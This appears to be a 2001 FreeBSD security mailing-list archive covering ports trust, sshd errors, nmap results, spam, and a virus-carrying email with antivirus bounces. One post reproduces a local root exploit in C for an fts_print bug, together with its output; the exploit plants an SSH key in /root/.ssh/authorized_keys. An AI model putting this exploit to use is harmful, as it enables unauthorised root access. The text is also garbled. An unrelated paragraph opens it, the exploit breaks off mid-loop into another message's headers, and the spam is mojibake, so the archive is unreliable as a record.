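What the check proves is exactly what Gary says: that the bytes on your disk are the bytes the port maintainer hashed. It says nothing about whether those bytes are trustworthy, and a distinfo that only records MD5 is itself a weak witness, which is why the result carries a separate "weak" flag rather than folding it into "ok".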
From owner-freebsd-security Thu Nov 22 13: 8: 2 2001
Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id 307F237B405; Thu, 22 Nov 2001 13:07:52 -0800 (PST)
Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAML7gJ01176; Thu, 22 Nov 2001 22:07:42 +0100 (CET) (envelope-from anthony@freebie.atkielski.com)
Message-ID: <03a801c17399$ba011c30$0a00000a@atkielski.com>
From: "Anthony Atkielski"
To: "Gary W. Swearingen"
Cc: "FreeBSD Questions"
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com>
Subject: Re: setuid on nethack?
Date: Thu, 22 Nov 2001 22:07:42 +0100
Organization: Anthony's Home Page (development site)
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not
installing this at a bank.

----- Original Message -----
From: "Gary W. Swearingen"
To: "Anthony Atkielski"
Cc: "FreeBSD Questions"
Sent: Thursday, November 22, 2001 22:00
Subject: Re: setuid on nethack?
> "Anthony Atkielski" writes:
>
> > When I add ports and stuff to my system, sometimes they are picked up from some
> > bizarre FTP sites, and in cases where the executables do not have to be trusted,
> > some guidelines on how better to secure them would be welcome. I know that
> > often they are being rebuilt from source before installation, but it isn't
> > really practical to read through the source for every port just to look for
> > suspicious code.
>
> I've also worried about this sort of thing since learning the ports
> system last winter. There's a lot of downloading and running of scripts
> as root going on and it's scary, especially after you've spent many days
> trying to improve your security. A few more observations on the subject:
>
> The main defense seems to be the fear of being tracked down by hackers
> more skillful than most crackers, aided by the use of MD5 to verify that
> you're installing the same thing that someone else has already installed
> and found (with meager testing, sadly, but necessarily) to work OK.
>
> I've read of little vandalware on FreeBSD (or Linux). The risk seems
> acceptable for most people, at least those who do backups. There also
> might not be any less risky practical alternatives for many.
>
> If one learns the details of the ports system, one can do all or most of
> the ports stuff as a regular user, downloading, building, and installing
> to non-standard, non-root-protected directories. Someone posted some
> clues about this on -questions (or -stable?) within the last couple of
> weeks, but I can't find my copy of it.
From owner-freebsd-security Thu Nov 22 13:20:14 2001
Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.68.158.10]) by hub.freebsd.org (Postfix) with ESMTP id 647E837B405 for ; Thu, 22 Nov 2001 13:20:00 -0800 (PST)
Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [192.168.18.91]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id fAMLJtP18694 for ; Thu, 22 Nov 2001 16:19:55 -0500 (GMT)
Received: from libertad.univalle.edu.co (jmcamayo@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.0/8.12.0) with ESMTP id fAMLUh2x038259 for ; Thu, 22 Nov 2001 16:30:43 -0500 (COT)
Received: from localhost (jmcamayo@localhost) by libertad.univalle.edu.co (8.12.0/8.12.0/Submit) with ESMTP id fAMLUhvK038256 for ; Thu, 22 Nov 2001 16:30:43 -0500 (COT)
Date: Thu, 22 Nov 2001 16:30:43 -0500 (COT)
From: Juan Mauricio Camayo
To: freebsd-security@FreeBSD.ORG
Subject: Re: Help on directories
In-Reply-To: <001b01c1737a$9f1a7480$3600a8c0@DAVE>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Yes, that is what I mean. Now, let me know the shells that do it.

On Thu, 22 Nov 2001, Dave Raven wrote:

> As to whether or not this was the original question I am unsure,
> but on the subject I was wondering how you achieve the same effect as
> adding a user to /etc/ftpchroot with a telnet / sshd shell.
> This would be so the user can access his directory etc (/home/bob) but not
> cd below it.
> Many shell servers etc use it.
>
> At least, I think that was the question.
>
>
> --Dave
> Optec Sec.
> ----- Original Message -----
> From: "Axel Scheepers"
> To: "Juan Mauricio Camayo"
> Sent: Thursday, November 22, 2001 7:02 PM
> Subject: Re: Help on directories
>
>
> > On Thu, Nov 22, 2001 at 11:41:25AM -0500, Juan Mauricio Camayo wrote:
> > > If someone knows about a program that prevents the users from going back of their
> > > own directory, but allows them to "see" their directories on it, just like the
> > > lids on Unix or linux, but not as restrictive as bash -r.
> >
> > I'm not quite sure what you mean, but you could try to chmod g-x for the
> dir,
> > that way it is still visible but only the owner can cd into it.
> > Hope this helps,
> > --
> > Axel Scheepers
> > UNIX System Administrator
> >
> > email: axel@axel.truedestiny.net
> >        ascheepers@vianetworks.nl
> > http://axel.truedestiny.net/~axel
> > ------------------------------------------
> > "You can't survive by sucking the juice from a wet mitten."
> > -- Charles Schulz, "Things I've Had to Learn Over and
> > Over and Over"
> > ------------------------------------------

From owner-freebsd-security Thu Nov 22 13:37:19 2001
Received: from smtp1.ihug.co.nz (smtp1.ihug.co.nz [203.109.252.7]) by hub.freebsd.org (Postfix) with ESMTP id 9040737B416 for ; Thu, 22 Nov 2001 13:37:13 -0800 (PST)
Received: from geoff (p36-max5.wlg.ihug.co.nz [203.173.231.36]) by smtp1.ihug.co.nz (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id KAA07838; Fri, 23 Nov 2001 10:37:04 +1300
X-Authentication-Warning: smtp1.ihug.co.nz: Host p36-max5.wlg.ihug.co.nz [203.173.231.36] claimed to be geoff
Message-ID: <007b01c1739d$b0673ca0$24e7adcb@lawn>
From: "Geoff Lawn"
To: "Mike Silbersack"
References: <20011121222647.O2710-100000@achilles.silby.com>
Subject: Re: Unknown transient service 1528/tcp
Date: Fri, 23 Nov 2001 10:35:52 +1300
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

Hi Mike,

> Were you nmapping the machine nmap was running on? You sometimes catch
> the port nmap is running the scan from when doing it that way, if I recall
> correctly.

Yes, I was running "nmap localhost". I did a sockstat while nmap was
running, and it looks like nmap chooses a random port to use for each
sequential port test. So I guess it's possible nmap chose a random port to
use to test the same port number, and thus saw the port as being open!

Thanks for your help,
Geoff

>
> On Thu, 22 Nov 2001, Geoff Lawn wrote:
>
> > Hi there,
> >
> > I regularly do an nmap on our server with the following results...
> >
> > Port      State    Service
> > 21/tcp    open     ftp
> > 22/tcp    open     ssh
> > 25/tcp    open     smtp
> > 110/tcp   open     pop-3
> > 443/tcp   open     https
> >
> > Recently I noticed the following service appear...
> > 1528/tcp  open     mciautoreg
> >
> > I did another nmap a minute later and the service was no longer there.
> >
> > Does anyone know what this might be?
> > Have I been hacked??
> >
> > Thanks,
> > Geoff
>
> Mike "Silby" Silbersack
>

From owner-freebsd-security Thu Nov 22 13:52: 7 2001
Received: from razor.tuxtendo.nl (cp133353-d.venra1.lb.nl.home.com [213.51.187.141]) by hub.freebsd.org (Postfix) with ESMTP id 8441037B416 for ; Thu, 22 Nov 2001 13:51:59 -0800 (PST)
Received: from localhost (localhost.localdomain [127.0.0.1]) by razor.tuxtendo.nl (Tuxtendo-ESMTP) with ESMTP id CCFBC27658; Fri, 23 Nov 2001 03:55:51 -0500 (EST)
Date: Fri, 23 Nov 2001 03:55:51 -0500 (EST)
From: PaZt
To: Michael Richards
Subject: Re: Odd sshd messages
In-Reply-To: <3BFCF73E.000001.96546@frodo.searchcanada.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Well, please correct me if I'm wrong, but isn't that version a bit buggy?

If so, I would suggest taking a good look at your system and of course
upgrading it.

cvsup rulez ;)

On Thu, 22 Nov 2001, Michael Richards wrote:

> I've been getting a number of odd sshd messages. I do not believe my
> sshd is vulnerable to any exploits. Here is what I see:
>
> Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes
> on input.
> Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes
> on input.
> Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes
> on input.
> Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes
> on input.
> Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes
> on input.
>
> May just be a bogus client, but it may also be someone hammering at
> the back door.
>
> I'm running:
> sshd version OpenSSH_2.3.0
>
> -Michael
> _________________________________________________________________
> http://fastmail.ca/ - Fast Free Web Email for Canadians

From owner-freebsd-security Thu Nov 22 15:24:23 2001
Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 3438237B405 for ; Thu, 22 Nov 2001 15:24:18 -0800 (PST)
Received: by mail.interchange.ca (Fastmailer, from userid 555) id 8358D2747; Thu, 22 Nov 2001 18:24:27 -0500 (EST)
MIME-Version: 1.0
Message-Id: <3BFD892B.000003.14411@ns.interchange.ca>
Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_RC68ULUXFQQMYJ0CCJD0"
To: pazt@razor.tuxtendo.nl
Subject: Re: Odd sshd messages
Cc: freebsd-security@FreeBSD.ORG
From: "Michael Richards"
X-Fastmail-IP: 24.43.130.241
Date: Thu, 22 Nov 2001 18:24:27 -0500 (EST)

Actually I solved the problem. This was a 4.2-RELEASE machine, but it had
been upgraded from a 3.x machine. Even though sshd 2.3.0 was installed, the
bootup scripts were running an old 1.x daemon provided by f-secure. So I
upgraded everything on that machine, so it's 4.4-STABLE now.

-Michael

> Well, please correct me if I'm wrong, but isn't that version a bit
> buggy?
>
> If so, I would suggest taking a good look at your system and
> of course upgrading it.
>
> cvsup rulez ;)
>
> On Thu, 22 Nov 2001, Michael Richards wrote:
>
>> I've been getting a number of odd sshd messages.
>> I do not believe
>> my sshd is vulnerable to any exploits. Here is what I see:
>>
>> Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check
>> bytes on input.
>> Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check
>> bytes on input.
>> Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check
>> bytes on input.
>> Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check
>> bytes on input.
>> Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check
>> bytes on input.
>>
>> May just be a bogus client, but it may also be someone hammering
>> at the back door.
>>
>> I'm running:
>> sshd version OpenSSH_2.3.0
>>
>> -Michael
>> _________________________________________________________________
>> http://fastmail.ca/ - Fast Free Web Email for Canadians

_________________________________________________________________
http://fastmail.ca/ - Fast Free Web Email for Canadians

From owner-freebsd-security Thu Nov 22 15:54: 8 2001
Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id DF76F37B416 for ; Thu, 22 Nov 2001 15:53:58 -0800 (PST)
Received: (qmail 5231 invoked by uid 1008); 22 Nov 2001 23:55:05 -0000
Date: Fri, 23 Nov 2001 01:55:05 +0200
From: veedee@c7.campus.utcluj.ro
To: freebsd-security@freebsd.org
Subject: fts_print bug?
Message-ID: <20011123015505.A5165@c7.campus.utcluj.ro>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="YiEDa0DAkWCtVeE4"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i

Does anyone know anything about this? It didn't work on my box
(4.3-RELEASE), but it did make some directories which I can't erase
anymore...

[#] rm -r 4965/
rm: fts_read: File name too long
[#] ls -lR 4965/
4965:
total 1
drwxr-xr-x  3 john  users  512 Nov 23 01:48
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!


4965/
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
:
total 1
drwxr-xr-x  3 john  users  512 Nov 23 01:48 AAAAAAAAAAAAAAAAAA

4965/
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
total 1
drwxr-xr-x  3 john  users  512 Nov 23 01:48
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!


4965/
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
:
total 1
drwxr-xr-x  3 john  users  512 Nov 23 01:48 AAAAAAAAAAAAAAAAAA

4965/
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
total 1
drwxr-xr-x  3 john  users  512 Nov 23 01:48
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!


4965/
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!
----

Sorry for the messy output. A friend of mine found the "exploit" (see
attachment) on BUGTRAQ.

Best regards,
Radu Bogdan Rusu (aka veedee)
C7 Campus Network System Administrator

Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="a.c"

/*
 * (c) 1999 babcia padlina ltd.
 *
 * bug in fts_print function allows to overwrite any file in system,
 * when running /etc/security script (executed from 'daily' scripts).
 *
 * affected systems:
 *  - freebsd (all versions)
 *  - probably openbsd/netbsd
 *
 * fix:
 *  - limit root's coredump size
 *  - patch libc
 */

#include
#include
#include
#include
#include

#define STRING  "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE    "/root/.ssh/authorized_keys"
#define CORE    "find.core"
#define DEPTH   300
#define BUFSIZE 250

int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;
	if (chdir(dir))
		return -1;
	if (symlink(linkfrom, linkto) < 0)
		return -1;
	return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
	int i = 0;
	char pid[10], buf[BUFSIZE];

	sprintf(pid, "%d", getpid());
	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) {
		perror("mkdir()");
		return -1;
	}
	if (chdir(pid)) {
		perror("chdir()");
		return -1;
	}
	bzero(buf, BUFSIZE);
	memset(buf, 0x41, BUFSIZE-1);
	for(i=0;i

; Thu, 22 Nov 2001 22:37:43 -0800 (PST)
Message-ID: <20011123063743.69061.qmail@web20205.mail.yahoo.com>
Received: from [212.16.200.178] by web20205.mail.yahoo.com via HTTP; Thu, 22 Nov 2001 22:37:43 PST
Date: Thu, 22 Nov 2001 22:37:43 -0800 (PST)
From: GoodNews
To: feedback@rocklyte.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Dear friend!
Èçâèíè, ÷òî îòáèðàþ òâîå âðåìÿ íà ÷òåíèå äàííîãî ïîñëàíèÿ,òàê êàê ìû âñå óñòàëè îò áåñêîíå÷íûõ ðåêëàìíûõ ðàññûëîê è âñÿ÷åñêîãî ìóñîðà,íî ÿ íàäåþñü, ÷òî íåñêîëüêî ìèíóò çàòðà÷åííîãî âðåìåíè ñìîãóò îêóïèòüñÿ, åñëè òû ðåøèøüñÿ èçìåíèòü ñâîé âçãëÿä íà îêðóæàþùóþ òåáÿ äåéñòâèòåëüíîñòü. Ïðåäëàãàåòñÿ â êîðíå èçìåíèòü ñâîþ æèçíü! È äëÿ ýòîãî ïðåäíàçíà÷åíà ïðîãðàììà, ðåàëüíî äåéñòâóþùàÿ, ñ ðåàëüíûìè âîçìîæíîñòÿìè çàðàáîòàòü äåíüãè, çàòðàòèâ íà ýòî íå î÷åíü áîëüøèå óñèëèÿ. Ýòîò ìåòîä çàðàáîòêà äåíåã íà ñàìîì äåëå ÄÅÉÑÒÂÓÅÒ ÍÀ 100%, ÊÎÃÄÀ ÓÃÎÄÍÎ, ÃÄÅ ÓÃÎÄÍÎ. Âû ñìîæåòå çàðàáîòàòü áîëåå 1.000.000 ðóáëåé â ïîñëåäóþùèå 90 äíåé. Ýòî íå öåïíîå ïèñüìî, à îòëè÷íàÿ ëåãàëüíàÿ âîçìîæíîñòü çàðàáîòàòü äåíüãè. Íå ïîæàëåéòå âðåìåíè, îçíàêîìüòåñü ñ ïðåäëàãàåìîé ïðîãðàììîé, è óñïåõ è áëàãîïîëó÷èå ïîñåòÿò Âàø äîì! Äàííîå ïèñüìî ïðèäåò ê Âàì íà ýòîò àäðåñ îäèí åäèíñòâåííûé ðàç, áîëüøå ÿ Âàñ íå ïîáåñïîêîþ. Íî åñëè ó Âàñ èìåþòñÿ è äðóãèå àäðåñà, íå îáèæàéòåñü, åñëè ýòî ïîñëàíèå ïðèäåò è íà íèõ,ïðîãðàììà íå ìîæåò îòñëåäèòü õîçÿèíà ÿùèêà, òîëüêî ôàêò ñóùåñòâîâàíèÿ àäðåñà. Åñëè Âàñ ýòî çàèíòåðåñîâàëî è Âû æåëàåòå áîëüøå óçíàòü î ðàáîòå ïðåäëàãàåìîé ïðîãðàììû, Âû ìîæåòå îòïðàâèòü äàííîå ñîîáùåíèå îáðàòíî ñ ïîìåòêîé "More", ÷òî áû ÿ âûñëàëà Âàì ïîäðîáíîå îïèñàíèå ðàáîòû ñèñòåìû ïî Âàøåìó æåëàíèþ, à íå çàíèìàòü Âàøå âðåìÿ è íå òðàòèòü Âàøè äåíüãè íà ïîëó÷åíèå âëîæåííîãî äîêóìåíòà. Âîçâðàùåííûå áåç äàííîé ïîìåòêè ïèñüìà áóäóò, êàê Âû ïðàâèëüíî äîãàäûâàåòåñü, óäàëÿòñÿ áåç ïðî÷òåíèÿ. Íî åñëè Âû õîòèòå ïîðóãàòüñÿ è âûïóñòèòü ïàð, òî ïîæàëóéñòà :-) Íàäåþñü, Âàì ñòàíåò ëåã÷å :-) Åùå ðàç èçâèíèòå, ÷òî îòíèìàþ Âàøå âðåìÿ. Óñïåõîâ âàì è âñÿ÷åñêèõ áëàã! __________________________________________________ Do You Yahoo!? Yahoo! GeoCities - quick and easy web site hosting, just $8.95/month. 
http://geocities.yahoo.com/ps/info1

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Nov 23 1: 9:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id B963C37B418; Fri, 23 Nov 2001 01:09:16 -0800 (PST)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 2F13A66B74; Fri, 23 Nov 2001 01:09:16 -0800 (PST)
Date: Fri, 23 Nov 2001 01:09:15 -0800
From: Kris Kennaway
To: Anthony Atkielski
Cc: "Gary W. Swearingen", FreeBSD Questions, freebsd-security@FreeBSD.ORG
Subject: Re: setuid on nethack?
Message-ID: <20011123010915.A35695@xor.obsecurity.org>
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="45Z9DzgjV8m4Oswq"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <03a801c17399$ba011c30$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:07:42PM +0100

--45Z9DzgjV8m4Oswq
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Thu, Nov 22, 2001 at 10:07:42PM +0100, Anthony Atkielski wrote:
> Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not
> installing this at a bank.

If you're going to run software written by Joe Random Coder, there's always an element of risk.
There's nothing about the FreeBSD ports collection which increases this risk, and in fact it makes the situation slightly safer, since we check all "spontaneous" changes in the md5 checksum of a distfile, where the distfile changes with no change in the software version (e.g. once a few years ago someone broke into the main ftp server for the tcp_wrappers package and added backdoor code to it. The compromised software could not be installed from the FreeBSD port unless you manually issued an override of the checksum). We have also found several isolated instances where software authors had 'spyware' code which reports details back to the author; these ports were summarily removed from the ports collection, again making things safer for the end user. Thirdly, since you have the source code you are free to examine it for yourself and evaluate your level of risk according to whichever criteria you choose.

Kris

--45Z9DzgjV8m4Oswq
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7/hI7Wry0BWjoQKURAthmAKDPgmZbU97GfKlPUnWaYMK1l0jwDQCeJKcn
5DBNwgzvQb/aBI0aYZS09h4=
=QuWq
-----END PGP SIGNATURE-----

--45Z9DzgjV8m4Oswq--

From owner-freebsd-security Fri Nov 23 1:13:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peony.ezo.net (peony.ezo.net [206.102.130.11]) by hub.freebsd.org (Postfix) with ESMTP id 4A84B37B416 for ; Fri, 23 Nov 2001 01:13:17 -0800 (PST)
Received: from localhost (c3-1a119.neo.rr.com [24.93.230.119]) by peony.ezo.net (8.11.0.Beta3/8.11.0.Beta3) with SMTP id fAN9Kk630245 for security@FreeBSD.ORG; Fri, 23 Nov 2001 04:20:46 -0500 (EST)
Message-Id: <200111230920.fAN9Kk630245@peony.ezo.net>
From: jflowers@ezo.net
To: security@FreeBSD.ORG
Subject: Interesting stuff - check it hehe ;-)
Date: Fri,23 Nov 2001
 04:13:57 -0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="bound"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.

This is a multi-part message in MIME format.

--bound
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

peace

--bound
Content-Type: audio/x-wav; name="whatever.exe"
Content-Transfer-Encoding: base64
Content-ID:

--bound--

From owner-freebsd-security Fri Nov 23 1:19:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.appliedcard.com (mail.appliedcard.com [207.43.202.218]) by hub.freebsd.org (Postfix) with ESMTP id 47D6137B435 for ; Fri, 23 Nov 2001 01:16:09 -0800 (PST)
From: BocaRaton4@appliedcard.com
X-Priority: 3 (Normal)
Date: Fri, 23 Nov 2001 04:15:09 -0500
Subject: Report to Recipient(s)
To: security@FreeBSD.ORG
Message-ID:
X-MIMETrack: Serialize by Router on BocaRaton4/WILM/ACS(Release 5.0.5 |September 22, 2000) at 11/23/2001 04:15:33 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii

Incident Information:-

Originator: owner-freebsd-security@FreeBSD.ORG
Recipients: security@FreeBSD.ORG
Subject: Interesting stuff - check it hehe ;-)

WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned.
From owner-freebsd-security Fri Nov 23 1:20: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cygnus.ahlstrom.net (cygnus.ahlstrom.net [141.127.2.8]) by hub.freebsd.org (Postfix) with ESMTP id 3BB6D37B73E for ; Fri, 23 Nov 2001 01:18:10 -0800 (PST)
Received: from ahlstromsmtp.ahlstrom.com (ahlstromsmtp.ahlstrom.com [141.127.2.58]) by cygnus.ahlstrom.net (8.9.3/8.9.3) with ESMTP id JAA46044 for ; Fri, 23 Nov 2001 09:17:14 GMT (envelope-from ahlstromsmtp/Ahlstrom@notes.ahlstrom.com)
From: ahlstromsmtp/Ahlstrom@notes.ahlstrom.com
X-Priority: 3 (Normal)
Date: Fri, 23 Nov 2001 11:16:01 +0200
Subject: Report to Recipient(s)
To: security@FreeBSD.ORG
Message-ID:
X-MIMETrack: Serialize by Router on ahlstromsmtp/Ahlstrom(Release 5.0.6a |January 17, 2001) at 23.11.2001 11:17:14
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii

Incident Information:-

Originator: owner-freebsd-security@FreeBSD.ORG
Recipients: security@FreeBSD.ORG
Subject: Interesting stuff - check it hehe ;-)

WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned.
From owner-freebsd-security Fri Nov 23 1:20:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp-1.nordnet.fr (smtp-1.nordnet.fr [194.206.126.239]) by hub.freebsd.org (Postfix) with ESMTP id 0398437B6B8 for ; Fri, 23 Nov 2001 01:18:06 -0800 (PST)
Received: from pop-3.nordnet.fr (pop-3.nordnet.fr [192.168.164.131]) by smtp-1.nordnet.fr (8.9.0/8.9.0) with ESMTP id KAA18156 for ; Fri, 23 Nov 2001 10:17:27 +0100
From: root@pop-3.nordnet.fr
Received: (from root@localhost) by pop-3.nordnet.fr (8.9.3/8.9.3) id KAA00471 Fri, 23 Nov 2001 10:17:24 +0100
Date: Fri, 23 Nov 2001 10:17:24 +0100
Message-Id: <200111230917.KAA00471@pop-3.nordnet.fr>
To: security@FreeBSD.ORG
Subject: ALERT: VIRUS DETECTED IN A MESSAGE SENT BY owner-freebsd-security@FreeBSD.ORG

V I R U S   A L E R T

Our automatic anti-virus detection system has detected a virus in a message sent to you by jflowers@ezo.net. Delivery of this message has been stopped. Please get in touch with the sender, jflowers@ezo.net, to sort out the problem with them.

************
Is your PC well protected? For effective, self-contained protection, www.securitoo.com/indexml.php is the solution against all known and future viruses.
************
Is your PC really protected ? For the best protection, www.securitoo.com/indexml.php is the solution that will protect your PC from all known viruses and viruses to be.
************

V I R U S   A L E R T

Our anti-virus system has detected a virus in an email sent by jflowers@ezo.net. We have stopped the delivery of this email. We invite you to contact jflowers@ezo.net to solve the problem.
From owner-freebsd-security Fri Nov 23 1:20:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from horse10.daimi.au.dk (horse10.daimi.au.dk [130.225.18.250]) by hub.freebsd.org (Postfix) with ESMTP id 91FC937B759 for ; Fri, 23 Nov 2001 01:18:21 -0800 (PST)
Received: (from root@localhost) by horse10.daimi.au.dk (8.11.6/8.11.6) id fAN9Hpi07830; Fri, 23 Nov 2001 10:17:51 +0100
Date: Fri, 23 Nov 2001 10:17:51 +0100
From: postmaster@daimi.au.dk
Message-Id: <200111230917.fAN9Hpi07830@horse10.daimi.au.dk>
To:
Subject: VIRUS IN YOUR MAIL

V I R U S   A L E R T

Our viruschecker found the 'W32/Aliz-A' virus(es) in your email to the following recipient(s):

->

Please check your system for viruses, or ask your system administrator to do so.

For your reference, here are the headers from your email:

------------------------- BEGIN HEADERS -----------------------------
Received: from speedy.iie.cnam.fr (system@speedy.iie.cnam.fr [192.70.23.7]) by mbone.iie.cnam.fr (8.9.3/8.9.3) with SMTP id KAA13655 for ; Fri, 23 Nov 2001 10:17:37 +0100 (MET)
From: security@FreeBSD.ORG
Received: by rubis.iie.cnam.fr (MX V4.2 AXP) id 233; Fri, 23 Nov 2001 10:17:51 MET
Date: Fri, 23 Nov 2001 10:17:50 MET
To: freebsd-security-digest@FreeBSD.ORG
Message-ID: <00A05790.91C13614.233@rubis.iie.cnam.fr>
Subject: security-digest V5 #349
-------------------------- END HEADERS ------------------------------

From owner-freebsd-security Fri Nov 23 1:20:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 9B28237B41B for ; Fri, 23 Nov 2001 01:19:49 -0800 (PST)
Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167CWO-0005Cj-00 for security@freebsd.org; Fri, 23 Nov 2001 09:21:20 +0000
Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:27:48 +0000
Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:17:13 -0000
Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A1@EXCHANGE>
From: EXCHANGE Panda Antivirus for Exchange Server
To: "'security@FreeBSD.ORG'"
Subject: Virus incident
Date: Fri, 23 Nov 2001 09:17:11 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain

Panda Antivirus has found the following viruses
in the message:

Server  : EXCHANGE
